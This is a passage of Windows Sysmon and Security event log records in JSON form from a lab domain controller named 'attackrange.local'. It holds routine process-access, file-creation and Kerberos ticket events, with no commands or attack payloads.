C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.862","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5077,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.862\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.862","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5078,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.862\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00103D040800}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.862","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00103D040800}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5079,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.877\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00103D040800}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.877","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00103D040800}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5080,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.893\r\nProcessGuid: {41C8662E-20CF-5F25-0000-00103D040800}\r\nProcessId: 2872\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_r342znfs.smh.ps1\r\nCreationUtcTime: 2020-08-01 07:59:11.893","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.893","ProcessGuid":"{41C8662E-20CF-5F25-0000-00103D040800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_r342znfs.smh.ps1","CreationUtcTime":"2020-08-01 07:59:11.893","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5081,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.924\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00103D040800}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.924","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00103D040800}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5082,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.924\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00103D040800}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.924","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00103D040800}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5083,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.987\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.987","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220595,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220596,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{B0223783-4A4F-16BB-7F4A-4A44C6266D53}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{B0223783-4A4F-16BB-7F4A-4A44C6266D53}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
